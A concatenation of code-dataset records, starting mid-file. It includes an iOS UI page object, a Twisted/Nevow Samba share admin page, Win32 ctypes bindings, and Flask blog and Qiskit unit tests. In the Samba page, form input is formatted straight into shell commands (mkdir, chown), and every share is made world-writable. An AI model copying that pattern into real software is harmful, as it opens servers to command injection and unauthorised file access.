is_enabled_element_by_text(self, text):\n \"\"\"指定元素是否可点击\"\"\"\n return self._is_enabled(self.__class__.__locators[text])\n\n @TestLogger.log()\n def click_element_by_text(self, text):\n \"\"\"点击指定元素\"\"\"\n self.click_element(self.__class__.__locators[text])\n\n @TestLogger.log()\n def get_element_value_by_text(self, text):\n \"\"\"获取指定元素的文本\"\"\"\n if self._is_element_present2(self.__class__.__locators[text]):\n el = self.get_element(self.__class__.__locators[text])\n return el.text\n\n @TestLogger.log()\n def click_my_group_name(self):\n \"\"\"点击我的群昵称\"\"\"\n self.click_element(self.__class__.__locators[\"我的群昵称\"])\n\n @TestLogger.log()\n def get_group_name_text(self):\n \"\"\"获取修改我的群昵称输入框文本\"\"\"\n text = self.get_element(self.__class__.__locators[\"我的群昵称输入框\"]).text\n return text\n\n @TestLogger.log()\n def is_exists_group_member_name(self, name):\n \"\"\"最后一条消息是否存在群成员昵称\"\"\"\n locator = (\n MobileBy.XPATH,\n '//XCUIElementTypeTable/XCUIElementTypeCell[last()]/XCUIElementTypeStaticText[@name=\"%s\"]' % name)\n return self._is_element_present2(locator)\n\n @TestLogger.log()\n def click_group_message(self):\n \"\"\"点击群短信\"\"\"\n self.click_element(self.__class__.__locators[\"群短信\"])\n\n @TestLogger.log()\n def is_element_exit_c(self, locator):\n \"\"\"指定元素是否存在\"\"\"\n try:\n if len(self.get_elements(self.__class__.__locators[locator])) > 0:\n return True\n else:\n return False\n except Exception:\n return False\n\n @TestLogger.log('获取控件文本')\n def get_element_text(self, locator):\n return self.get_text(self.__class__.__locators[locator])\n\n @TestLogger.log()\n def press_element_by_text(self, text):\n \"\"\"长按指定元素\"\"\"\n if self._is_element_present2(self.__class__.__locators[text]):\n self.swipe_by_direction(self.__class__.__locators[text], \"press\", 5)\n\n @TestLogger.log()\n def press_element_by_text2(self, text, index=-1):\n \"\"\"长按指定元素,默认选择最后一个\"\"\"\n if self._is_element_present2(self.__class__.__locators[text]):\n self.swipe_by_direction2(self.__class__.__locators[text], \"press\", index, 5)\n\n @TestLogger.log('判断消息记录是否存在消息记录')\n def is_element_present_mess(self):\n return self._is_element_present(self.__class__.__locators['我的电脑-聊天记录'])","sub_path":"pages/GroupChat.py","file_name":"GroupChat.py","file_ext":"py","file_size_in_byte":47689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"444113853","text":"from nevow import rend, loaders, tags\nfrom twisted.application import service, internet, strports\nfrom twisted.web import server, static\nfrom twisted.python import failure\nfrom nevow import inevow, rend, appserver, static, guard, url, loaders, stan\nfrom nevow.taglibrary import tabbedPane\nimport time, formal, LDAP, os\nimport Tree, Settings\nfrom Core import PageHelpers, confparse, Utils, WebUtils\nfrom Pages import Tools\n\nfrom twisted.python import log\n\ndef reloadSamba():\n def cont(_):\n return WebUtils.system(\"/etc/init.d/samba restart\")\n\n return WebUtils.system(Settings.BaseDir+'/configurator --samba').addBoth(cont)\n\nclass Shares(PageHelpers.DataTable):\n def getTable(self):\n headings = [\n ('Share Name', 'share'), \n ('Shared Path', 'path'), \n ('Comment', 'comment'), \n ('Writable', 'writable'), \n ('Public', 'public'),\n ('Permission', 'group')\n ]\n sharesconf = self.sysconf.SambaShares\n\n shares = []\n\n for share in sharesconf.keys():\n if share==\"global\":\n continue\n\n row = [share]\n for i in ['path', 'comment', 'writable', 'public','valid users']:\n sdata = sharesconf[share].get(i, \"\")\n 
if i == 'valid users':\n sdata = sdata.replace('@', '').replace('\"', '').replace(',root', '').strip()\n\n row.append(sdata)\n\n shares.append(row)\n\n return headings, shares\n\n def addForm(self, form):\n form.addField('share', formal.String(required=True), label = \"Shared Folder\")\n form.addField('path', formal.String(required=True), label = \"Shared Path\", description = \"Path to be shared\")\n form.addField('comment', formal.String(required=True), label = \"Comment\")\n\n form.addField('public', formal.Boolean(), label = \"Public\")\n form.addField('writable', formal.Boolean(), label = \"Writable\")\n\n l = LDAP.createLDAPConnection(Settings.LDAPServer, 'o='+Settings.LDAPBase, Settings.LDAPManager, Settings.LDAPPass)\n dc = \"%s,o=%s\" % (LDAP.domainToDC(Settings.defaultDomain), Settings.LDAPBase)\n\n groups = LDAP.getGroups(l, dc)\n groups.sort()\n \n form.addField('group', formal.String(), \n formal.widgetFactory(formal.SelectChoice, options = [(i[1],i[1]) for i in groups]), \n label = \"Required Group\")\n \n def addAction(self, data):\n if data['path'].startswith(\"/\"): # Absolute path, use it as given\n path = data['path']\n else: # Relative paths are created under the Samba data directory\n path = '/var/lib/samba/data/%s' % data['path']\n \n share = {}\n share[\"path\"] = path\n share[\"comment\"] = data['comment']\n share[\"create mode\"] = '664'\n share[\"directory mode\"] = '775'\n share[\"nt acl support\"] = 'yes'\n WebUtils.system('mkdir -p %s' % path)\n \n if data['public']:\n share[\"public\"] = \"yes\"\n\n if data['writable']:\n share[\"writable\"] = \"yes\"\n\n if data['group']:\n share[\"valid users\"] = '@\"%s\",root' % data['group']\n WebUtils.system('chown -R root:\"%s\" %s' % (data['group'], path))\n\n WebUtils.system('chmod a+rwx %s' % path)\n WebUtils.system('chmod -R a+rw %s' % path)\n\n shares = self.sysconf.SambaShares\n shares[data['share'].encode(\"ascii\", \"replace\")] = share\n self.sysconf.SambaShares = shares\n \n def deleteItem(self, item):\n shares = self.getTable()[1]\n\n target = shares[item]\n\n name = target[0]\n\n shares = self.sysconf.SambaShares\n del shares[name]\n self.sysconf.SambaShares = shares\n\n def returnAction(self, data):\n Utils.log.msg('%s added file share %s' % (self.avatarId.username, repr(data)))\n return reloadSamba().addBoth(lambda _: url.root.child('Samba'))\n\nclass Page(Tools.Page):\n def __init__(self, *a, **kw):\n Tools.Page.__init__(self, *a, **kw)\n self.shareTable = Shares(self, 'Shares', 'share')\n\n def render_content(self, ctx, data):\n \n return ctx.tag[\n tags.h3[tags.img(src=\"/images/sharefold.png\"), \" Shared folders\"],\n self.shareTable.applyTable(self)\n ]\n","sub_path":"tums/trunk/release/Pages/Samba.py","file_name":"Samba.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"502305960","text":"from ctypes import POINTER\nfrom ctypes import WINFUNCTYPE\nfrom ctypes import c_int\nfrom ctypes import c_int64\nfrom ctypes import c_void_p\nfrom ctypes import windll\nfrom ctypes.wintypes import ATOM\nfrom ctypes.wintypes import BOOL\nfrom ctypes.wintypes import DWORD\nfrom ctypes.wintypes import HANDLE\nfrom ctypes.wintypes import HBITMAP\nfrom ctypes.wintypes import HDC\nfrom ctypes.wintypes import HGDIOBJ\nfrom ctypes.wintypes import HINSTANCE\nfrom ctypes.wintypes import HMENU\nfrom ctypes.wintypes import HMODULE\nfrom ctypes.wintypes import HWND\nfrom ctypes.wintypes import 
LPARAM\nfrom ctypes.wintypes import LPCWSTR\nfrom ctypes.wintypes import LPPOINT\nfrom ctypes.wintypes import LPRECT\nfrom ctypes.wintypes import RECT\nfrom ctypes.wintypes import UINT\nfrom ctypes.wintypes import WPARAM\n\nINT_PTR = c_int64\n\nDLGPROC = WINFUNCTYPE(INT_PTR, HWND, UINT, WPARAM, LPARAM)\n\n# Window Styles\nWS_OVERLAPPED = 0x00000000\nWS_POPUP = 0x80000000\nWS_CHILD = 0x40000000\nWS_MINIMIZE = 0x20000000\nWS_VISIBLE = 0x10000000\nWS_DISABLED = 0x08000000\nWS_CLIPSIBLINGS = 0x04000000\nWS_CLIPCHILDREN = 0x02000000\nWS_MAXIMIZE = 0x01000000\nWS_CAPTION = 0x00C00000\nWS_BORDER = 0x00800000\nWS_DLGFRAME = 0x00400000\nWS_VSCROLL = 0x00200000\nWS_HSCROLL = 0x00100000\nWS_SYSMENU = 0x00080000\nWS_THICKFRAME = 0x00040000\nWS_GROUP = 0x00020000\nWS_TABSTOP = 0x00010000\nWS_MINIMIZEBOX = 0x00020000\nWS_MAXIMIZEBOX = 0x00010000\nWS_TILED = WS_OVERLAPPED\nWS_ICONIC = WS_MINIMIZE\nWS_SIZEBOX = WS_THICKFRAME\n\n# Extended Window Styles\nWS_EX_DLGMODALFRAME = 0x00000001\nWS_EX_NOPARENTNOTIFY = 0x00000004\nWS_EX_TOPMOST = 0x00000008\nWS_EX_ACCEPTFILES = 0x00000010\nWS_EX_TRANSPARENT = 0x00000020\nWS_EX_MDICHILD = 0x00000040\nWS_EX_TOOLWINDOW = 0x00000080\nWS_EX_WINDOWEDGE = 0x00000100\nWS_EX_CLIENTEDGE = 0x00000200\nWS_EX_CONTEXTHELP = 0x00000400\nWS_EX_RIGHT = 0x00001000\nWS_EX_LEFT = 0x00000000\nWS_EX_RTLREADING = 0x00002000\nWS_EX_LTRREADING = 0x00000000\nWS_EX_LEFTSCROLLBAR = 0x00004000\nWS_EX_RIGHTSCROLLBAR = 0x00000000\nWS_EX_CONTROLPARENT = 0x00010000\nWS_EX_STATICEDGE = 0x00020000\nWS_EX_APPWINDOW = 0x00040000\nWS_EX_LAYERED = 0x00080000\nWS_EX_NOINHERITLAYOUT = 0x00100000\nWS_EX_NOREDIRECTIONBITMAP = 0x00200000\nWS_EX_LAYOUTRTL = 0x00400000\nWS_EX_COMPOSITED = 0x02000000\nWS_EX_NOACTIVATE = 0x08000000\nWS_EX_PALETTEWINDOW = WS_EX_WINDOWEDGE | WS_EX_TOOLWINDOW | WS_EX_TOPMOST\n\n# Window Messages\nWM_CLOSE = 0x0010\nWM_CONTEXTMENU = 0x007B\nWM_KEYDOWN = 0x0100\nWM_INITDIALOG = 0x0110\nWM_COMMAND = 0x0111\n\n# Dialog Styles\nDS_SETFONT = 0x0040\nDS_MODALFRAME = 0x0080\nDS_CENTER = 0x0800\nDS_CENTERMOUSE = 0x1000\n\n# Dialog Box Command IDs\nIDOK = 1\nIDCANCEL = 2\nIDABORT = 3\nIDRETRY = 4\nIDIGNORE = 5\nIDYES = 6\nIDNO = 7\nIDCLOSE = 8\nIDHELP = 9\nIDTRYAGAIN = 10\nIDCONTINUE = 11\n\n# Static Control Constants\nSS_LEFT = 0x00000000\nSS_CENTER = 0x00000001\nSS_RIGHT = 0x00000002\nSS_ICON = 0x00000003\nSS_BLACKRECT = 0x00000004\nSS_GRAYRECT = 0x00000005\nSS_WHITERECT = 0x00000006\nSS_BLACKFRAME = 0x00000007\nSS_GRAYFRAME = 0x00000008\nSS_WHITEFRAME = 0x00000009\nSS_USERITEM = 0x0000000A\nSS_SIMPLE = 0x0000000B\nSS_LEFTNOWORDWRAP = 0x0000000C\nSS_OWNERDRAW = 0x0000000D\nSS_BITMAP = 0x0000000E\nSS_ENHMETAFILE = 0x0000000F\nSS_ETCHEDHORZ = 0x00000010\nSS_ETCHEDVERT = 0x00000011\nSS_ETCHEDFRAME = 0x00000012\nSS_TYPEMASK = 0x0000001F\nSS_REALSIZECONTROL = 0x00000040\nSS_NOPREFIX = 0x00000080\nSS_NOTIFY = 0x00000100\nSS_CENTERIMAGE = 0x00000200\nSS_RIGHTJUST = 0x00000400\nSS_REALSIZEIMAGE = 0x00000800\nSS_SUNKEN = 0x00001000\nSS_EDITCONTROL = 0x00002000\nSS_ENDELLIPSIS = 0x00004000\nSS_PATHELLIPSIS = 0x00008000\nSS_WORDELLIPSIS = 0x0000C000\nSS_ELLIPSISMASK = 0x0000C000\n\n# Edit Control Styles\nES_LEFT = 0x0000\nES_CENTER = 0x0001\nES_RIGHT = 0x0002\nES_MULTILINE = 0x0004\nES_UPPERCASE = 0x0008\nES_LOWERCASE = 0x0010\nES_PASSWORD = 0x0020\nES_AUTOVSCROLL = 0x0040\nES_AUTOHSCROLL = 0x0080\nES_NOHIDESEL = 0x0100\nES_OEMCONVERT = 0x0400\nES_READONLY = 0x0800\nES_WANTRETURN = 0x1000\nES_NUMBER = 0x2000\n\n# Menu flags\nMF_POPUP = 0x00000010\nMF_HILITE = 0x00000080\nMF_SEPARATOR = 
0x00000800\n\n# SetWindowPos Flags\nSWP_NOSIZE = 0x0001\nSWP_NOMOVE = 0x0002\nSWP_NOZORDER = 0x0004\nSWP_NOREDRAW = 0x0008\nSWP_NOACTIVATE = 0x0010\nSWP_FRAMECHANGED = 0x0020\nSWP_SHOWWINDOW = 0x0040\nSWP_HIDEWINDOW = 0x0080\nSWP_NOCOPYBITS = 0x0100\nSWP_NOOWNERZORDER = 0x0200\nSWP_NOSENDCHANGING = 0x0400\nSWP_DEFERERASE = 0x2000\nSWP_ASYNCWINDOWPOS = 0x4000\n\n# DPI_AWARENESS_CONTEXT handle\nDPI_AWARENESS_CONTEXT_UNAWARE = -1\nDPI_AWARENESS_CONTEXT_SYSTEM_AWARE = -2\nDPI_AWARENESS_CONTEXT_PER_MONITOR_AWARE = -3\nDPI_AWARENESS_CONTEXT_PER_MONITOR_AWARE_V2 = -4\nDPI_AWARENESS_CONTEXT_UNAWARE_GDISCALED = -5\n\n_AdjustWindowRectExForDpi = windll.user32.AdjustWindowRectExForDpi\n_AdjustWindowRectExForDpi.argtypes = (LPRECT, DWORD, BOOL, DWORD, UINT)\n_AdjustWindowRectExForDpi.restype = BOOL\n\n_BitBlt = windll.gdi32.BitBlt\n_BitBlt.argtypes = (HDC, c_int, c_int, c_int, c_int, HDC, c_int, c_int, DWORD)\n_BitBlt.restype = BOOL\n\n_ClientToScreen = windll.user32.ClientToScreen\n_ClientToScreen.argtypes = (HWND, LPPOINT)\n_ClientToScreen.restype = BOOL\n\n_CreateCompatibleDC = windll.gdi32.CreateCompatibleDC\n_CreateCompatibleDC.argtypes = (HDC,)\n_CreateCompatibleDC.restype = HDC\n\n_CreateDIBSection = windll.gdi32.CreateDIBSection\n_CreateDIBSection.argtypes = (HDC, c_void_p, UINT, c_void_p, HANDLE, DWORD)\n_CreateDIBSection.restype = HBITMAP\n\n_DeleteDC = windll.gdi32.DeleteDC\n_DeleteDC.argtypes = (HDC,)\n_DeleteDC.restype = BOOL\n\n_DeleteObject = windll.gdi32.DeleteObject\n_DeleteObject.argtypes = (HGDIOBJ,)\n_DeleteObject.restype = BOOL\n\n_DestroyMenu = windll.user32.DestroyMenu\n_DestroyMenu.argtypes = (HMENU,)\n_DestroyMenu.restype = BOOL\n\n_DialogBoxIndirectParamW = windll.user32.DialogBoxIndirectParamW\n_DialogBoxIndirectParamW.argtypes = (HINSTANCE, c_void_p, HWND, c_void_p, LPARAM)\n_DialogBoxIndirectParamW.restype = INT_PTR\n\n_EndDialog = windll.user32.EndDialog\n_EndDialog.argtypes = (HWND, INT_PTR)\n_EndDialog.restype = BOOL\n\n_FindWindowW = windll.user32.FindWindowW\n_FindWindowW.argtypes = (LPCWSTR, LPCWSTR)\n_FindWindowW.restype = HWND\n\n_GetClassInfoExW = windll.user32.GetClassInfoExW\n_GetClassInfoExW.argtypes = (HINSTANCE, LPCWSTR, c_void_p)\n_GetClassInfoExW.restype = BOOL\n\n_GetClientRect = windll.user32.GetClientRect\n_GetClientRect.argtypes = (HWND, LPRECT)\n_GetClientRect.restype = BOOL\n\n_GetDC = windll.user32.GetDC\n_GetDC.argtypes = (HWND,)\n_GetDC.restype = HDC\n\n_GetDesktopWindow = windll.user32.GetDesktopWindow\n_GetDesktopWindow.restype = HWND\n\n_GetDlgItem = windll.user32.GetDlgItem\n_GetDlgItem.argtypes = (HWND, c_int)\n_GetDlgItem.restype = HWND\n\n_GetDlgItemInt = windll.user32.GetDlgItemInt\n_GetDlgItemInt.argtypes = (HWND, c_int, POINTER(BOOL), BOOL)\n_GetDlgItemInt.restype = UINT\n\n_GetDpiForWindow = windll.user32.GetDpiForWindow\n_GetDpiForWindow.argtypes = (HWND,)\n_GetDpiForWindow.restype = UINT\n\n_GetModuleHandleW = windll.kernel32.GetModuleHandleW\n_GetModuleHandleW.argtypes = (LPCWSTR,)\n_GetModuleHandleW.restype = HMODULE\n\n_GetParent = windll.user32.GetParent\n_GetParent.argtypes = (HWND,)\n_GetParent.restype = HWND\n\n_GetSubMenu = windll.user32.GetSubMenu\n_GetSubMenu.argtypes = (HMENU, c_int)\n_GetSubMenu.restype = HMENU\n\n_GetWindowDC = windll.user32.GetWindowDC\n_GetWindowDC.argtypes = (HWND,)\n_GetWindowDC.restype = HDC\n\n_GetWindowRect = windll.user32.GetWindowRect\n_GetWindowRect.argtypes = (HWND, LPRECT)\n_GetWindowRect.restype = BOOL\n\n_LoadMenuIndirectW = windll.user32.LoadMenuIndirectW\n_LoadMenuIndirectW.argtypes = 
(c_void_p,)\n_LoadMenuIndirectW.restype = HMENU\n\n_RegisterClassExW = windll.user32.RegisterClassExW\n_RegisterClassExW.argtypes = (c_void_p,)\n_RegisterClassExW.restype = ATOM\n\n_ReleaseDC = windll.user32.ReleaseDC\n_ReleaseDC.argtypes = (HWND, HDC)\n_ReleaseDC.restype = c_int\n\n_ScreenToClient = windll.user32.ScreenToClient\n_ScreenToClient.argtypes = (HWND, LPPOINT)\n_ScreenToClient.restype = BOOL\n\n_SelectObject = windll.gdi32.SelectObject\n_SelectObject.argtypes = (HDC, HGDIOBJ)\n_SelectObject.restype = HGDIOBJ\n\n_SetDlgItemInt = windll.user32.SetDlgItemInt\n_SetDlgItemInt.argtypes = (HWND, c_int, UINT, BOOL)\n_SetDlgItemInt.restype = BOOL\n\n_SetFocus = windll.user32.SetFocus\n_SetFocus.argtypes = (HWND,)\n_SetFocus.restype = HWND\n\n_SetThreadDpiAwarenessContext = windll.user32.SetThreadDpiAwarenessContext\n_SetThreadDpiAwarenessContext.argtypes = (c_void_p,)\n_SetThreadDpiAwarenessContext.restype = c_void_p\n\n_SetWindowPos = windll.user32.SetWindowPos\n_SetWindowPos.argtypes = (HWND, HWND, c_int, c_int, c_int, c_int, UINT)\n_SetWindowPos.restype = BOOL\n\n_SetWindowTextW = windll.user32.SetWindowTextW\n_SetWindowTextW.argtypes = (HWND, LPCWSTR)\n_SetWindowTextW.restype = BOOL\n\n_TrackPopupMenuEx = windll.user32.TrackPopupMenuEx\n_TrackPopupMenuEx.argtypes = (HMENU, UINT, c_int, c_int, HWND, POINTER(RECT))\n_TrackPopupMenuEx.restype = BOOL\n","sub_path":"transparentwindow/_win.py","file_name":"_win.py","file_ext":"py","file_size_in_byte":8736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"472762742","text":"import unittest\nimport mock \nfrom mock import patch\nfrom flaskblog.models import Post\nfrom flask import current_app\n\n\nclass PostModelTestCase(unittest.TestCase):\n def setUp(self):\n self.db = current_app.config['db']\n self.db.create_all()\n\n def tearDown(self):\n self.db.drop_all()\n\n def test_add_one_post(self):\n \"\"\"Test adding a record and retrieving all fields.\"\"\"\n Post.add('testfile.md', 'Test title','123','text1','tag1,tag2')\n self.assertEquals(1, len(Post.query.filter_by(filename='testfile.md').all()))\n\n p = Post.query.filter_by(filename='testfile.md').first()\n self.assertIsNotNone(p)\n self.assertEquals(1, p.id)\n self.assertEquals('testfile.md', p.filename)\n self.assertEquals('Test title', p.title)\n self.assertEquals(p.createTime, p.updateTime)\n self.assertEquals(123, p.createTime)\n self.assertEquals('test-title', p.urlslug)\n self.assertEquals('text1', p.text)\n self.assertEquals('tag1,tag2', p.tags)\n\n def test_update_post(self):\n \"\"\"Test adding a record and retrieving all fields.\"\"\"\n Post.add('testfile.md', 'Original Title', 123,'text1','tag1')\n p = Post.query.filter_by(filename='testfile.md').first()\n self.assertEquals('Original Title', p.title)\n \n Post.update('testfile.md','New Title',124,'textNew','tagsNew')\n\n p = Post.query.filter_by(filename='testfile.md').first()\n self.assertEquals('New Title', p.title)\n self.assertEquals(124, p.updateTime)\n self.assertEquals('textNew', p.text)\n self.assertEquals('tagsNew', p.tags)\n\n def helper_add_posts(self):\n Post.add('testfile1.md','1 Title','123','text1','tag111')\n Post.add('testfile2.md','2 Title','124','post text 2','tag2,tag222')\n Post.add('testfile3.md','3 Title','125','post text 3','tag3,tag222')\n Post.add('testfile4.md','4 Title','126','post text 4','tag4,tag222')\n Post.add('testfile5.md','5 Title','127','post text 5','tag4,tag222')\n\n def test_retrieve_first_page(self):\n \"\"\"Test retrieving a page 
of posts.\"\"\"\n self.helper_add_posts()\n\n results, _ = Post.getPosts()\n self.assertEquals('testfile5.md', results[0].filename)\n self.assertEquals('testfile4.md', results[1].filename)\n self.assertEquals('testfile3.md', results[2].filename)\n\n def test_retrieve_second_page(self):\n \"\"\"Test retrieving 2nd page of posts.\"\"\"\n self.helper_add_posts()\n\n results, _ = Post.getPosts(page=1, numPerPage=2)\n self.assertEquals(2, len(results))\n self.assertEquals('testfile3.md', results[0].filename)\n self.assertEquals('testfile2.md', results[1].filename)\n\n def test_get_post_by_slug(self):\n Post.add('testfile.md', 'Test title','123','text1','tag1')\n result = Post.getPostByField(slug='test-title')\n self.assertEquals(result, Post.query.filter_by(filename='testfile.md').first())\n\n def test_delete_post(self):\n Post.add('testfile.md', 'Test title','123','text1','tag1')\n record = Post.getPostByField(filename='testfile.md')\n self.assertEquals('testfile.md', record.filename)\n\n Post.deletePost(filename='testfile.md')\n record = Post.getPostByField(filename='testfile.md')\n self.assertEquals(None, record)\n\n def test_delete_all(self):\n Post.add('testfile.md', 'Test title','123','text1','tag1,tag2')\n results, _ = Post.getPosts()\n self.assertEquals(1, len(results))\n\n Post.deleteAll()\n results, _ = Post.getPosts()\n self.assertEquals(0, len(results))\n","sub_path":"flaskblog/tests/test_post_model.py","file_name":"test_post_model.py","file_ext":"py","file_size_in_byte":3668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"65560934","text":"# This code is part of Qiskit.\n#\n# (C) Copyright IBM 2021.\n#\n# This code is licensed under the Apache License, Version 2.0. You may\n# obtain a copy of this license in the LICENSE.txt file in the root directory\n# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.\n#\n# Any modifications or derivative works of this code must retain this\n# copyright notice, and modified files need to carry a notice indicating\n# that they have been altered from the originals.\n\n\"\"\"Data processor tests.\"\"\"\n\nimport numpy as np\n\nfrom qiskit.result.models import ExperimentResultData, ExperimentResult\nfrom qiskit.result import Result\nfrom qiskit.test import QiskitTestCase\nfrom qiskit.qobj.common import QobjExperimentHeader\nfrom qiskit_experiments import ExperimentData\nfrom qiskit_experiments.base_experiment import BaseExperiment\nfrom qiskit_experiments.data_processing.data_processor import DataProcessor\nfrom qiskit_experiments.data_processing.exceptions import DataProcessorError\nfrom qiskit_experiments.data_processing.nodes import (\n ToReal,\n ToImag,\n Probability,\n)\n\n\nclass FakeExperiment(BaseExperiment):\n \"\"\"Fake experiment class for testing.\"\"\"\n\n def __init__(self):\n \"\"\"Initialise the fake experiment.\"\"\"\n self._type = None\n super().__init__((0,), \"fake_test_experiment\")\n\n def circuits(self, backend=None, **circuit_options):\n \"\"\"Fake circuits.\"\"\"\n return []\n\n\nclass DataProcessorTest(QiskitTestCase):\n \"\"\"Class to test DataProcessor.\"\"\"\n\n def setUp(self):\n \"\"\"Setup variables used for testing.\"\"\"\n self.base_result_args = dict(\n backend_name=\"test_backend\",\n backend_version=\"1.0.0\",\n qobj_id=\"id-123\",\n job_id=\"job-123\",\n success=True,\n )\n\n mem1 = ExperimentResultData(\n memory=[\n [[1103260.0, -11378508.0], [2959012.0, -16488753.0]],\n [[442170.0, -19283206.0], [-5279410.0, -15339630.0]],\n 
[[3016514.0, -14548009.0], [-3404756.0, -16743348.0]],\n ]\n )\n\n mem2 = ExperimentResultData(\n memory=[\n [[5131962.0, -16630257.0], [4438870.0, -13752518.0]],\n [[3415985.0, -16031913.0], [2942458.0, -15840465.0]],\n [[5199964.0, -14955998.0], [4030843.0, -14538923.0]],\n ]\n )\n\n header1 = QobjExperimentHeader(\n clbit_labels=[[\"meas\", 0], [\"meas\", 1]],\n creg_sizes=[[\"meas\", 2]],\n global_phase=0.0,\n memory_slots=2,\n metadata={\"experiment_type\": \"fake_test_experiment\", \"x_values\": 0.0},\n )\n\n header2 = QobjExperimentHeader(\n clbit_labels=[[\"meas\", 0], [\"meas\", 1]],\n creg_sizes=[[\"meas\", 2]],\n global_phase=0.0,\n memory_slots=2,\n metadata={\"experiment_type\": \"fake_test_experiment\", \"x_values\": 1.0},\n )\n\n res1 = ExperimentResult(shots=3, success=True, meas_level=1, data=mem1, header=header1)\n res2 = ExperimentResult(shots=3, success=True, meas_level=1, data=mem2, header=header2)\n\n self.result_lvl1 = Result(results=[res1, res2], **self.base_result_args)\n\n raw_counts = {\"0x0\": 4, \"0x2\": 6}\n data = ExperimentResultData(counts=dict(**raw_counts))\n header = QobjExperimentHeader(\n metadata={\"experiment_type\": \"fake_test_experiment\"},\n clbit_labels=[[\"c\", 0], [\"c\", 1]],\n creg_sizes=[[\"c\", 2]],\n n_qubits=2,\n memory_slots=2,\n )\n res = ExperimentResult(shots=9, success=True, meas_level=2, data=data, header=header)\n self.exp_data_lvl2 = ExperimentData(FakeExperiment())\n self.exp_data_lvl2.add_data(Result(results=[res], **self.base_result_args))\n\n super().setUp()\n\n def test_empty_processor(self):\n \"\"\"Check that a DataProcessor without steps does nothing.\"\"\"\n data_processor = DataProcessor(\"counts\")\n\n datum = data_processor(self.exp_data_lvl2.data[0])\n self.assertEqual(datum, {\"00\": 4, \"10\": 6})\n\n datum, history = data_processor.call_with_history(self.exp_data_lvl2.data[0])\n self.assertEqual(datum, {\"00\": 4, \"10\": 6})\n self.assertEqual(history, [])\n\n def test_to_real(self):\n \"\"\"Test scaling and conversion to real part.\"\"\"\n processor = DataProcessor(\"memory\", [ToReal(scale=1e-3)])\n\n exp_data = ExperimentData(FakeExperiment())\n exp_data.add_data(self.result_lvl1)\n\n new_data = processor(exp_data.data[0])\n\n expected_old = {\n \"memory\": [\n [[1103260.0, -11378508.0], [2959012.0, -16488753.0]],\n [[442170.0, -19283206.0], [-5279410.0, -15339630.0]],\n [[3016514.0, -14548009.0], [-3404756.0, -16743348.0]],\n ],\n \"metadata\": {\"experiment_type\": \"fake_test_experiment\", \"x_values\": 0.0},\n }\n\n expected_new = np.array([[1103.26, 2959.012], [442.17, -5279.41], [3016.514, -3404.7560]])\n\n self.assertEqual(exp_data.data[0], expected_old)\n self.assertTrue(np.allclose(new_data, expected_new))\n\n # Test that we can call with history.\n new_data, history = processor.call_with_history(exp_data.data[0])\n\n self.assertEqual(exp_data.data[0], expected_old)\n self.assertTrue(np.allclose(new_data, expected_new))\n\n self.assertEqual(history[0][0], \"ToReal\")\n self.assertTrue(np.allclose(history[0][1], expected_new))\n\n def test_to_imag(self):\n \"\"\"Test that we can average the data.\"\"\"\n processor = DataProcessor(\"memory\")\n processor.append(ToImag(scale=1e-3))\n\n exp_data = ExperimentData(FakeExperiment())\n exp_data.add_data(self.result_lvl1)\n\n new_data = processor(exp_data.data[0])\n\n expected_old = {\n \"memory\": [\n [[1103260.0, -11378508.0], [2959012.0, -16488753.0]],\n [[442170.0, -19283206.0], [-5279410.0, -15339630.0]],\n [[3016514.0, -14548009.0], [-3404756.0, 
-16743348.0]],\n ],\n \"metadata\": {\"experiment_type\": \"fake_test_experiment\", \"x_values\": 0.0},\n }\n\n expected_new = np.array(\n [\n [-11378.508, -16488.753],\n [-19283.206000000002, -15339.630000000001],\n [-14548.009, -16743.348],\n ]\n )\n\n self.assertEqual(exp_data.data[0], expected_old)\n self.assertTrue(np.allclose(new_data, expected_new))\n\n # Test that we can call with history.\n new_data, history = processor.call_with_history(exp_data.data[0])\n self.assertEqual(exp_data.data[0], expected_old)\n self.assertTrue(np.allclose(new_data, expected_new))\n\n self.assertEqual(history[0][0], \"ToImag\")\n self.assertTrue(np.allclose(history[0][1], expected_new))\n\n def test_populations(self):\n \"\"\"Test that counts are properly converted to a population.\"\"\"\n\n processor = DataProcessor(\"counts\")\n processor.append(Probability(\"00\"))\n\n new_data = processor(self.exp_data_lvl2.data[0])\n\n self.assertEqual(new_data[0], 0.4)\n self.assertEqual(new_data[1], 0.4 * (1 - 0.4) / 10)\n\n def test_validation(self):\n \"\"\"Test the validation mechanism.\"\"\"\n\n for validate, error in [(False, AttributeError), (True, DataProcessorError)]:\n processor = DataProcessor(\"counts\")\n processor.append(Probability(\"00\", validate=validate))\n\n with self.assertRaises(error):\n processor({\"counts\": [0, 1, 2]})\n","sub_path":"test/data_processing/test_data_processing.py","file_name":"test_data_processing.py","file_ext":"py","file_size_in_byte":7626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"190696042","text":"import os\nimport sys\nfrom pylib.base.flags import Flags\n\nfrom config import VALID_MODULES\nfrom web.server.app import create_app\n\n\ndef main():\n Flags.PARSER.add_argument(\n '--port',\n '-p',\n type=int,\n required=False,\n default=5000,\n help='Port the server should use',\n )\n Flags.PARSER.add_argument(\n '--environment',\n '-e',\n required=False,\n type=str,\n default='',\n help='The Zenysis environment that the server should use. '\n 'Can optionally be specified by setting the `ZEN_ENV` environment '\n 'variable. The environment variable will take precedence over '\n 'the command-line argument.',\n choices=[env for env in VALID_MODULES],\n )\n Flags.InitArgs()\n\n environment = (\n Flags.ARGS.environment if Flags.ARGS.environment else os.getenv('ZEN_ENV')\n )\n if not environment:\n raise ValueError(\n 'The Zenysis environment that the server should use is not set. 
